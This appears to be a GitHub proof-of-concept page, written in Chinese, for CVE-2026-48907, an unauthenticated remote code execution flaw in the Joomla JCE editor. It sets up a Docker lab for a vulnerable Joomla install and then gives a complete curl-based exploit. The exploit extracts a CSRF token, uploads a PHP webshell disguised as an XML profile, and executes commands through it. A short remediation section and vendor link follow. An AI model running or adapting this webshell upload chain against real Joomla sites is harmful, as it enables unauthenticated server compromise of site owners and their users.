pssec-io/CVE-2026-48907

GitHub: pssec-io/CVE-2026-48907

针对 Joomla JCE 编辑器 CVE-2026-48907 未授权远程代码执行漏洞的 PoC 项目,提供 Docker 实验环境和完整的漏洞利用复现流程。

Stars: 0 | Forks: 0

# CVE-2026-48907 — Joomla JCE 未授权 RCE 实验环境 ## 概述 **CVE-2026-48907** 是 **JCE (Joomla Content Editor)** 中一个极其严重的 (CVSS 10.0) 未授权远程代码执行漏洞。JCE 是 Joomla 中安装最广泛的编辑器扩展,此漏洞影响所有 **≤ 2.9.99.4** 版本。 `profiles.import` 端点接受无需任何身份验证的文件上传。攻击者可以上传伪装成 XML 配置文件的恶意 PHP 文件,该文件会被写入服务器的 `tmp/` 目录,并通过 HTTP 直接执行——完全不需要任何凭据。 | 详情 | 值 | |---|---| | **CVE** | CVE-2026-48907 | | **CVSS 评分** | 10.0 严重 | | **受影响版本** | JCE ≤ 2.9.99.4 | | **修复版本** | JCE ≥ 2.9.99.5 | | **CISA KEV 收录** | 是 — 2026 年 6 月 16 日 | | **是否被积极利用** | 是 | ## 实验环境搭建 ### 前置条件 - Docker + Docker Compose - Kali Linux(或任何 Linux 主机) ### 1. 启动易受攻击的环境 ``` docker compose up -d ``` ### 2. 完成 Joomla 安装程序 在浏览器中打开 `http://localhost:8080` 并使用以下凭据完成安装向导: | 字段 | 值 | |---|---| | 数据库主机 | `db` | | 数据库名称 | `joomla` | | 数据库用户 | `joomla` | | 数据库密码 | `joomlapass` | ### 3. 安装存在漏洞的 JCE 扩展 ``` wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip ``` 然后在 Joomla 管理后台 → **系统 → 扩展 → 安装** → 上传该 ZIP 文件。 ## 漏洞利用 ### 4. 提取 CSRF token 和 session cookie ``` URL=http://localhost:8080 TOKEN=$(curl -s -c cookies.txt "$URL/" \ | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \ | head -n1) ``` ### 5. 通过未授权的配置文件导入上传 PHP webshell ``` curl -i -s -b cookies.txt -c cookies.txt \ -F "profile_file=@shell.xml.php;type=application/xml" \ -F "task=profiles.import" \ -F "${TOKEN}=1" \ "$URL/index.php?option=com_jce" ``` ### 6. 验证远程代码执行 ``` curl -i -s -b cookies.txt -c cookies.txt \ "$URL/tmp/shell.xml.php?cmd=id" ``` 预期输出:`uid=33(www-data) gid=33(www-data)` ## 文件 | 文件 | 描述 | |---|---| | `docker-compose.yml` | 启动存在漏洞的 Joomla 5.3.1 + MySQL 8.0 | | `shell.xml.php` | 最小化的 PHP webshell payload | | `instructions.txt` | 逐步的漏洞利用说明 | ## 修复方案 立即将 JCE 更新至 **2.9.99.5 或更高版本**。 针对旧版 Joomla 的官方供应商安全通告和免费补丁: **[JCE 安全更新 — joomlacontenteditor.net](https://www.joomlacontenteditor.net/news/jce-security-update-and-a-free-patch-for-older-sites)** ## 免责声明 *由 [PSsec](https://pssec.io)* 提供
标签:CISA项目, Cutter, ffuf, Joomla, PoC, Web安全, 暴力破解, 版权保护, 编程工具, 蓝队分析, 请求拦截, 远程代码执行